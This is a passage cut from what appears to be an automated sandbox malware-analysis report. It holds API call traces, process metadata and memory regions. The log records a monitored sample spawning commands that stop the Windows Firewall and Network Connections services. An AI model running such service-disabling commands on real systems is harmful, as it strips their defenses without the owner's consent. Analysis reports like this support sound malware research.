returned 0xbe [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET GROUP\r\n[grou", _MaxCount=0x10) returned 12 [0295.997] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఑") returned 0x33 [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET HELP\r\ncomman", _MaxCount=0x10) returned 11 [0295.997] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఔ") returned 0x19 [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET HELPMSG\r\nmes", _MaxCount=0x10) returned 11 [0295.997] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 గ") returned 0xc1 [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET LOCALGROUP\r\n", _MaxCount=0x10) returned 7 [0295.997] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 చ") returned 0x16 [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET PAUSE\r\nservi", _MaxCount=0x10) returned 3 [0295.997] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఝ") returned 0x33 [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET SESSION\r\n[\\\\", _MaxCount=0x10) returned 15 [0295.997] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.997] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఠ") returned 0x234 [0295.997] _wcsnicmp (_String1="NET stop Windows", _String2="NET SHARE\r\nshare", _MaxCount=0x10) returned 12 [0295.998] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="氈ѷ\x11筴 ణ") returned 0x13 [0295.998] _wcsnicmp (_String1="NET stop Windows", _String2="NET START BROWSE", _MaxCount=0x10) returned 14 [0295.998] LocalFree (hMem=0x4776c08) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 ద") returned 0x14 [0295.998] _wcsnicmp (_String1="NET stop Windows", _String2="NET START EVENTL", _MaxCount=0x10) returned 14 [0295.998] LocalFree (hMem=0x4777208) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 ఩") returned 0x14 [0295.998] _wcsnicmp (_String1="NET stop Windows", _String2="NET START NETLOG", _MaxCount=0x10) returned 14 [0295.998] LocalFree (hMem=0x4777208) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="㍠ѷ\x11筴 బ") returned 0x11 [0295.998] _wcsnicmp (_String1="NET stop Windows", _String2="NET START RPCSS\r", _MaxCount=0x10) returned 14 [0295.998] LocalFree (hMem=0x4773360) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 య") returned 0x14 [0295.998] _wcsnicmp (_String1="NET stop Windows", _String2="NET START SCHEDU", _MaxCount=0x10) returned 14 [0295.998] LocalFree (hMem=0x4777208) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="濸ѷ\x11筴 ల") returned 0x12 [0295.998] _wcsnicmp (_String1="NET stop Windows", _String2="NET START SERVER", _MaxCount=0x10) returned 14 [0295.998] LocalFree (hMem=0x4776ff8) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="㍠ѷ\x11筴 వ") returned 0xf [0295.998] _wcsnicmp (_String1="NET stop Windows", _String2="NET START UPS\r\n", _MaxCount=0x10) returned 14 [0295.998] LocalFree (hMem=0x4773360) returned 0x0 [0295.998] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 స") returned 0x17 [0295.999] _wcsnicmp (_String1="NET stop Windows", _String2="NET START WORKST", _MaxCount=0x10) returned 14 [0295.999] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఻") returned 0x18 [0295.999] _wcsnicmp (_String1="NET stop Windows", _String2="NET START\r\n[serv", _MaxCount=0x10) returned 14 [0295.999] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ా") returned 0x2a [0295.999] _wcsnicmp (_String1="NET stop Windows", _String2="NET STATISTICS\r\n", _MaxCount=0x10) returned 14 [0295.999] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ు") returned 0x15 [0295.999] _wcsnicmp (_String1="NET stop Windows", _String2="NET STOP\r\nservic", _MaxCount=0x10) returned 19 [0295.999] LocalFree (hMem=0x4777bb0) returned 0x0 [0295.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౄ") returned 0x58 [0295.999] _wcsnicmp (_String1="NET stop Windows", _String2="NET TIME\r\n\r\n[\\\\c", _MaxCount=0x10) returned -1 [0295.999] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ే") returned 0x184 [0295.999] _wcsnicmp (_String1="NET stop Windows", _String2="NET USE\r\n[device", _MaxCount=0x10) returned -2 [0295.999] LocalFree (hMem=0x477c3b0) returned 0x0 [0295.999] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ొ") returned 0xf0 [0295.999] _wcsnicmp (_String1="NET stop Windows", _String2="NET USER\r\n[usern", _MaxCount=0x10) returned -2 [0295.999] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ్") returned 0x47 [0296.000] _wcsnicmp (_String1="NET stop Windows", _String2="NET VIEW\r\n[\\\\com", _MaxCount=0x10) returned -3 [0296.000] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౐") returned 0xc2 [0296.000] _wcsnicmp (_String1="NET stop Windows", _String2="NET\r\n [ ACCOU", _MaxCount=0x10) returned 19 [0296.000] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౓") returned 0x28d [0296.000] _wcsnicmp (_String1="NET stop Windows", _String2="SERVICES\r\nNET ST", _MaxCount=0x10) returned -5 [0296.000] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౖ") returned 0x483 [0296.000] _wcsnicmp (_String1="NET stop Windows", _String2="SYNTAX\r\nThe foll", _MaxCount=0x10) returned -5 [0296.000] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౙ") returned 0xa86 [0296.000] _wcsnicmp (_String1="NET stop Windows", _String2="NAMES\r\nThe follo", _MaxCount=0x10) returned 4 [0296.000] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ౜") returned 0x54 [0296.000] _wcsnicmp (_String1="NET stop Windows", _String2="\r\nFor more infor", _MaxCount=0x10) returned 97 [0296.000] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.000] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ௼") returned 0xad [0296.001] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0296.001] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ௿") returned 0x2e [0296.001] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0296.001] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ం") returned 0x7d [0296.001] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0296.001] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 అ") returned 0x26 [0296.001] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0296.001] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఈ") returned 0x19 [0296.001] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0296.001] LocalFree (hMem=0x4777bb0) returned 0x0 [0296.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఋ") returned 0x1b [0296.001] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0296.001] LocalFree (hMem=0x4777bb0) returned 0x0 [0296.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఎ") returned 0xbe [0296.001] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0296.001] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.001] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఑") returned 0x33 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0296.002] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఔ") returned 0x19 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0296.002] LocalFree (hMem=0x4777bb0) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 గ") returned 0xc1 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0296.002] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 చ") returned 0x16 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0296.002] LocalFree (hMem=0x4777bb0) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఝ") returned 0x33 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0296.002] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ఠ") returned 0x234 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0296.002] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="氈ѷ\x11筴 ణ") returned 0x13 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.002] LocalFree (hMem=0x4776c08) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 ద") returned 0x14 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.002] LocalFree (hMem=0x4777208) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 ఩") returned 0x14 [0296.002] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.002] LocalFree (hMem=0x4777208) returned 0x0 [0296.002] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="㍠ѷ\x11筴 బ") returned 0x11 [0296.003] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.003] LocalFree (hMem=0x4773360) returned 0x0 [0296.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="爈ѷ\x11筴 య") returned 0x14 [0296.003] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.003] LocalFree (hMem=0x4777208) returned 0x0 [0296.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="濸ѷ\x11筴 ల") returned 0x12 [0296.003] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.003] LocalFree (hMem=0x4776ff8) returned 0x0 [0296.003] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="㍠ѷ\x11筴 వ") returned 0xf [0296.003] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.004] LocalFree (hMem=0x4773360) returned 0x0 [0296.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 స") returned 0x17 [0296.004] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.004] LocalFree (hMem=0x4777bb0) returned 0x0 [0296.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ఻") returned 0x18 [0296.004] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0296.004] LocalFree (hMem=0x4777bb0) returned 0x0 [0296.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="쎰ѷ\x11筴 ా") returned 0x2a [0296.004] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0296.004] LocalFree (hMem=0x477c3b0) returned 0x0 [0296.004] FormatMessageW (in: dwFlags=0x1900, lpSource=0x150002, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x11f78c, nSize=0x0, Arguments=0x11f788 | out: lpBuffer="箰ѷ\x11筴 ు") returned 0x15 [0296.004] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0296.004] GetFileType (hFile=0x40) returned 0x2 [0296.005] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x11f788 | out: lpMode=0x11f788) returned 1 [0296.005] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x4777bb0*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x11f78c, lpReserved=0x0 | out: lpBuffer=0x4777bb0*, lpNumberOfCharsWritten=0x11f78c*=0x15) returned 1 [0296.006] LocalFree (hMem=0x4777bb0) returned 0x0 [0296.006] NetApiBufferFree (Buffer=0x4777f78) returned 0x0 [0296.006] NetApiBufferFree (Buffer=0x4777f90) returned 0x0 [0296.006] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Windows Firewall" [0296.006] exit (_Code=1) Thread: id = 216 os_tid = 0x12f4 Thread: id = 217 os_tid = 0x12ec Process: id = "38" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6f627000" os_pid = "0x738" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C net stop Network Connections" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3086 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3087 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3088 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3089 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3090 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3091 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3092 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3093 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3094 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3095 start_va = 0xd00000 end_va = 0xd51fff monitored = 1 entry_point = 0xd14fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 3096 start_va = 0xd60000 end_va = 0x4d5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 3097 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3098 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3099 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3100 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3101 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 3102 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3103 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 3104 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3105 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3106 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3107 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3108 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3109 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3110 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3111 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3112 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3113 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3131 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3197 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3198 start_va = 0x5d0000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 3199 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3200 start_va = 0x710000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 3201 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3202 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3203 start_va = 0x880000 end_va = 0xbb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = 